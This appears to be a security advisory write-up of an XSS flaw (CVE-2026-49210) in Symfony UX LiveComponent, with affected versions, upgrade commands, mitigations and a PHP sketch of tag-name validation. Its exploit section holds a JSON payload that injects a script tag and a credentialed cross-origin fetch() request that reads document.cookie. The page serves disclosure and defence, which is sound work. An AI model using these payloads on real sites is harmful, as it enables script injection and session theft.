Symfony UX LiveComponent, Cross-Site Scripting (XSS), CVE-2026-49210 (Medium) -DC-Jun2026-505


`Symfony\UX\LiveComponent\Util\ChildComponentPartialRenderer::createHtml()` interpolates the `$childTag` argument directly into the HTML output as a tag name, without escaping or validation. The value originates from client-controlled JSON (the `tag` field of each entry under `children`) parsed by `LiveComponentSubscriber` and propagated through `InterceptChildComponentRenderSubscriber`, so an attacker who can reach the Live Component endpoint can inject arbitrary HTML, including `<script>` tags, on any re-render of a Live Component that contains at least one child component.
In the default configuration, the Live Component endpoint is gated by an `Accept: application/vnd.live-component+html` request-header check that cannot be set cross-origin without a CORS preflight, so the issue is primarily a defense-in-depth gap. It becomes directly exploitable on applications that have relaxed CORS to allow this header from untrusted origins, or that have been pivoted from another same-origin XSS.
The fix validates `$childTag` against a strict HTML tag-name regex before interpolation and rejects any value that does not match, so anything that would not be a valid HTML tag is dropped before it reaches the response. The patch is available for branch 2.x (and forward-ported to 3.x). Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.

<h2 style="color: blue;">DailyCVE Form</h2>

Platform: Symfony UX LiveComponent
Version: 2.8.0–2.35.0, 3.0.0
Vulnerability: XSS via child tag
Severity: Medium (CVSS 4.8)
Date: 2026-05-29

<h2 style="color: blue;">Prediction: 2026-06-15 (patch available)</h2>

<h2 style="color: blue;">What Undercode Say</h2>

<h2 style="color: blue;">Affected Versions</h2>

```bash
composer show symfony/ux-live-component
# Vulnerable: >=2.8.0, <2.36.0 | >=3.0.0, <3.1.0
```

Version Check (Composer)

```bash
composer outdated symfony/ux-live-component
# Check whether the installed version falls in the vulnerable range
```

Verify Patch Applied

```bash
composer require symfony/ux-live-component:^2.36.0
# or for the 3.x branch:
composer require symfony/ux-live-component:^3.1.0
```

Exploit

An attacker can inject arbitrary HTML by crafting a malicious `tag` value under `children` in the JSON payload sent to the Live Component endpoint:

```json
{
  "children": {
    "1": {
      "tag": "script>alert('XSS')</script"
    }
  }
}
```

Since `ChildComponentPartialRenderer::createHtml()` interpolates `$childTag` directly into HTML output without escaping or validation, the payload is rendered as an executable HTML tag. The attack requires:
1. Reaching the Live Component endpoint – the attacker must be able to send requests to `/_components/{name}[/{action}]`
2. Component with child components – the targeted Live Component must contain at least one child component
3. Bypassing the Accept header gate – either via relaxed CORS configuration or via a same-origin XSS pivot

Cross-origin example (only works where CORS has been relaxed to allow the `Accept` header from the attacker's origin):

```javascript
fetch('https://target.com/_components/MyComponent', {
  method: 'POST',
  headers: {
    'Accept': 'application/vnd.live-component+html',
    'Content-Type': 'application/json'
  },
  credentials: 'include',
  body: JSON.stringify({
    children: { '1': { tag: 'script>alert(document.cookie)</script' } }
  })
});
```

Protection

1. Upgrade to Patched Version

```bash
composer require symfony/ux-live-component:^2.36.0
# or for the 3.x branch of symfony/ux-live-component:
composer require symfony/ux-live-component:^3.1.0
```

Patched versions validate `$childTag` against a strict HTML tag-name regex and reject any non-matching value.
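The check described above, shown as an added illustration beside the unchecked form; this is not the symfony/ux-live-component source, and the `TAG_NAME_PATTERN` regex, the `ChildTagRenderer` class and the attribute string are assumptions standing in for the project's own code:

```php
<?php
// Added illustration, not the symfony/ux-live-component source. The regex
// below is an assumption standing in for the "strict HTML tag-name regex"
// the advisory describes; the real patched code may differ.
declare(strict_types=1);

final class ChildTagRenderer
{
    // Assumed allow-list: a letter followed by letters, digits or hyphens
    // (hyphens keep custom elements such as <my-widget> working).
    private const TAG_NAME_PATTERN = '/^[a-z][a-z0-9-]*$/i';

    /** Unchecked form: the client-controlled tag lands in the markup as-is. */
    public static function createHtmlUnchecked(string $childTag, string $attrs): string
    {
        return sprintf('<%s %s></%s>', $childTag, $attrs, $childTag);
    }

    /** Hardened form: only a syntactically valid tag name is interpolated. */
    public static function createHtml(string $childTag, string $attrs): string
    {
        if (!preg_match(self::TAG_NAME_PATTERN, $childTag)) {
            throw new \InvalidArgumentException(
                sprintf('Invalid child tag name "%s".', $childTag)
            );
        }
        return sprintf('<%s %s></%s>', $childTag, $attrs, $childTag);
    }
}

// Constructed sample input: the tag values follow the shape of the advisory's
// JSON payload; the attribute string is assumed to be escaped already.
$attrs = 'data-live-id="child-1"';
foreach (['div', 'my-widget', "script>alert('XSS')</script"] as $tag) {
    echo 'unchecked: ', ChildTagRenderer::createHtmlUnchecked($tag, $attrs), "\n";
    try {
        echo 'hardened:  ', ChildTagRenderer::createHtml($tag, $attrs), "\n";
    } catch (\InvalidArgumentException $e) {
        echo 'hardened:  rejected (', $e->getMessage(), ")\n";
    }
}
```

`div` and `my-widget` pass both forms; the `script>…</script` value is emitted verbatim by the unchecked form and rejected by the hardened one before any markup is built.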

2. Verify CORS Configuration

Ensure your application does not relax CORS to allow the `Accept: application/vnd.live-component+html` header from untrusted origins.

3. Audit Same-Origin XSS Vectors

Since this vulnerability can be pivoted from another same-origin XSS, ensure your application is hardened against XSS in general.

4. Monitor LiveComponent Endpoints

Review access logs for `/_components/` endpoints for unusual patterns or unexpected payloads.

Impact

- Cross-Site Scripting (XSS) – arbitrary HTML and JavaScript injection into the rendered page
- Session Hijacking – theft of session cookies and user credentials
- Data Exfiltration – exposure of sensitive information accessible via the victim's session
- Privilege Escalation – enabling access to privileged services and functionality
- Defense-in-Depth Bypass – the Accept header gate is not a CSRF protection; it only provides defense-in-depth
- Exploitation Conditions – directly exploitable on applications with relaxed CORS or those pivoted from another same-origin XSS

CVE-2026-49210 was disclosed on May 29, 2026, with patches available in versions 2.36.0 and 3.1.0.

Sources:

Reported By: github.com